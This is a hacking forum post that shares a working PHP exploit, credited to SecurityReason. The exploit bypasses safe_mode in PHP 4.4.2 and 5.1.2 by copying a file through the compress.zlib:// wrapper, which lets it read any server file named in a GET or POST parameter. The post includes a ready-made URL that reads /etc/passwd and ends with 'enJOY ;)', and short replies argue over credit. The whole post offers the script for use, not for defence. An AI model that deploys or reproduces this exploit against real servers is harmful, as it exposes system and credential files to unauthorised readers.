Bypassing Safe Mod

hxxp://www.site.com/lol.php?file=/etc/passwd

lol.php :

<?php
echo dirname(__FILE__);
/*
Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2
by Maksymilian Arciemowicz SecurityReason.Com
cxib [at] securityreason [dot] com and max [at] jestsuper [dot] pl
pozdro sp3x
*/


$file=""; // File to Include... or use _GET _POST
$tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp



echo "<PRE>\n";
if(empty($file))
{
if(empty($_GET['file']))
{
if(empty($_POST['file']))
{
die("\nSet varibles \$tymczas, \$file or use for varible file POST, GET like ?file=/etc/passwd\n <B><CENTER><FONTCOLOR=\"RED\">SecurityReason.Com Exploit</FONT></CENTER></B>");
}
else
{
$file=$_POST['file'];
}
}
else
{
$file=$_GET['file'];
}
}

$temp=tempnam($tymczas, "cx");

if(copy("compress.zlib://".$file, $temp))
{
$zrodlo = fopen($temp, "r");
$tekst = fread($zrodlo, filesize($temp));
fclose($zrodlo);
echo "<B>--- Start File ".htmlspecialchars($file)."-------------</B>\n".htmlspecialchars($tekst)."\n<B>--- End File".htmlspecialchars($file)." ---------------\n";
unlink($temp);

die("\n<FONT COLOR=\"RED\"><B>File".htmlspecialchars($file)." has been already loaded. SecurityReason Team;]</B></FONT>");
}
else
{
die("<FONT COLOR=\"RED\"><CENTER>Sorry... File<B>".htmlspecialchars($file)."</B> dosen't exists or you don't have access.</CENTER></FONT>");
}
?>

enJOY ;)

good)

2all:
Please, read the rules and don't write small posts like "10x, good" etc. Try to say more on a subject.

neM3Sis - I have seen it somewhere... You have copy-pasted it =)

2limpompo
English, please)
He is French, he can't understand you.

The credits:
by Maksymilian Arciemowicz SecurityReason.Com

neM3Sis - I have seen it somewhere... You have copy-pasted it =)
_http://securityreason.com/achievement_exploitalert/8
nemezis posted with copyrites ..